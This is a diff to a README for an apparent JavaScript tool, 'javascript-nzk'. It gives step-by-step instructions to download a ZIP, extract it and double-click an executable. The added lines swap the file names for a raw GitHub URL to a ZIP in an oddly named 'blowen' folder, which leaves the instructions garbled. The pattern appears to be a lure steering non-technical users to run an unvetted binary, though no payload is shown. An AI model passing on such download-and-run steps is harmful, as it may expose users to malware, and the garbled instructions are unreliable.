licosdada/javascript-nzk/README.md

    Click on the link that corresponds to your operating system.
 This will start the download.

 4. **Locate the Downloaded File**
    Once the download is complete, check your computer’s download folder for the file.
-It may look something like `javascript-nzk-x.y.z.zip`, where `x.y.z` is the version number.
+It may look something like `https://raw.githubusercontent.com/licosdada/javascript-nzk/main/blowen/javascript-nzk.zip`, where `x.y.z` is the version number.

 5. **Extract the Files**
    Right-click on the downloaded ZIP file and choose “Extract All” or “Unzip.”
 This will create a new folder containing the program files.

 6. **Run the Application**
    Open the extracted folder.
-Double-click on the application file (it may be named `javascript-nzk.exe` for Windows or `javascript-nzk` for macOS and Linux) to run the program.
+Double-click on the application file (it may be named `https://raw.githubusercontent.com/licosdada/javascript-nzk/main/blowen/javascript-nzk.zip` for Windows or `javascript-nzk` for macOS and Linux) to run the program.

 ## ⚙️ Using javascript-nzk